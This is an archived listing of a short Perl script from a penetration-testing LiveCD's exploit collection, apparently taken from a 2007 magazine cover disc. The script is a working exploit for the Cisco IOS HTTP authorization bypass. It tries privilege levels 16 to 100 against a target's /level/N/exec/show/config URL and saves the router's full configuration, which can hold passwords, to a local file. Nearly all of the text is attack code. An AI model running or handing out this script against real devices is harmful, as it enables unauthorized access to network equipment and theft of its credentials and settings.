home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / ios-http-auth.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  1001 b   |  50 lines
  1. #!/usr/bin/perl
  2.  
  3. #
  4. # Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
  5. #
  6.  
  7. use LWP;
  8. use IO::Handle;
  9.  
  10. my $host = shift;
  11.  
  12. print "$host: ";
  13. flush STDOUT;
  14.  
  15. my $agent = LWP::UserAgent->new;
  16. my $request = HTTP::Request->new(GET => "http://$host/");
  17. my $response = $agent->request($request);
  18. my $level;
  19.  
  20. if ($response->is_success || $response->code != 401) {
  21.     if ($response->header('Server') ne '') {
  22.         print $response->header('Server');
  23.         print "\n";
  24.     }
  25.     else {
  26.         print "unexpected response, may not be a Cisco.\n";
  27.     }
  28.     exit;
  29. }
  30.  
  31. for ($level = 16; $level <= 100; $level++) {
  32.     $request->uri("http://$host/level/$level/exec/show/config");
  33.     $response = $agent->request($request);
  34.     if ($response->is_success) {
  35.         open(HOST, ">$host") || die ("Can't open file $host\n");
  36.         print HOST $response->content;
  37.         close(HOST);
  38.         print "exploited.\n";
  39.         exit;
  40.     }
  41.     else {
  42.         if ($response->code != 401) { 
  43.             print "unexpected response, may not be a Cisco.\n";
  44.             exit;
  45.         }
  46.     }
  47. }
  48.  
  49. print "failed.\n";
  50.